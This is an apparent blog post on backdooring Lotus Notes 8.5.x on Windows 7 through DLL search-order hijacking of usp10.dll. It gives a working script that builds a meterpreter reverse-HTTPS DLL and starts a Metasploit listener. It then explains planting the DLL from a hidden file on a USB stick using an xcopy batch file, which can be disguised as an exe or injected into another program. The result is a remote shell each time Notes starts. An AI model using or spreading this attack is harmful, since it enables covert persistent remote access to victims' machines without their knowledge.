Backdooring Win7 and LotusNotes 8.5.x using Uniscribe dll path spoofing

Looking for DLL in all the wrong places,  Searching your Eyes looking for traces ..

Lotus Notes 8.5.x (up to 8.5.2 FP2) Multi-user setup on Windows 7 (32 bit) in a workgroup or domain environment with roaming profiles has a dll search path weakness which can be abused to gain a remote shell on the system.  No need for admin privileges.

LotusNotes

Lotus Notes main executable NLNOTES.EXE searches for the Uniscribe dll in all the wrong places ….

I will demonstrate how can a specially crafted dll file be included into the system. Each time Lotus Notes is started our backdoor connects to a server and starts a reverse meterpreter shell.

Lets start first with creating our dll payload using a simplified custom script, save this in your Metasploit root folder and make it executable.

#!/bin/bash
echo "************************************************************"
echo "Lotus Notes 8.5.x DLL search order hijacking  Vulnerability "
echo "           Automatic shellcode generator                    "
echo "                                                            "
echo "************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig tun0  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   FreeBSD|OpenBSD) IP=`ifconfig  tun0 | grep -E 'inet.[0-9]' | grep -v '127.0.0.1' | awk '{ print $2}'` ;;
   SunOS) IP=`ifconfig -a | grep inet | grep -v '127.0.0.1' | awk '{ print $2} '` ;;
   *) IP="Unknown";;
esac
#echo "$IP"
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode -t dll  > usp10.dll
if [ ! -d "$ShellCode" ]; then
mkdir ShellCode
fi
mv usp10.dll ShellCode
echo "****************************************************"
echo "         usp10.dll compiled - all done"
echo " DLL is located in ShellCode subfolder in Metasploit"
echo "      starting the meterpreter listener..."
echo "****************************************************"

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate explorer.exe'  E

Please change the tun0 to a network device you are using eth0,eth1,wlan0,wlan1,ppp0 …

What happens here is basically this:

We create a dll reverse https meterpreter payload and export it as a dll file called usp10.dll NLNOTES.EXE looks for this particular dll inside a user controlled folder in                 C:\users\user\AppData\Lotus\Notes\Data first and if it does not find it there then it goes on

debug

debug

so we need to upload the meterpreter dll into this location and name it exactly as usp10.dll   Every time Lotus starts our dll gets loaded silently; migrates from rundll32.exe into explorer.exe  and we get a meterpreter connection on our listener.

There are many ways how to get the dll onto the target from social engineering tricks to some more sophisticated ways. In our scenario I’m gonna use a USB stick formatted to NTFS. The on it will have special attributes  “attrib +r +h +s +a usp10.dll”   so its hidden, system, read-only. On most windows systems Explorer will not display this file.  Next a simple batch script to copy the file into the desired folder

echo off
xcopy usp10.dll %USERPROFILE%\appdata\local\lotus\notes\data /s /g /h /r /c

We can compile this into an exe for example by bat2exe from F2KO        http://www.f2ko.de/downloads/Bat_To_Exe_Converter.zip

Or we can just inject this code into some other application on the USB stick and let it do its stuff

Another way is to include the DLL and Executable on the Teensy++ and set it up like so in the previous article.

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

2 Responses to Backdooring Win7 and LotusNotes 8.5.x using Uniscribe dll path spoofing

  1. tricknicks says:

    Hello sir,
    Great Job sir..
    Which Debugger you used as shown in above screen shot ? Please Reply or mail me soon Sir..

    Thank You !!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s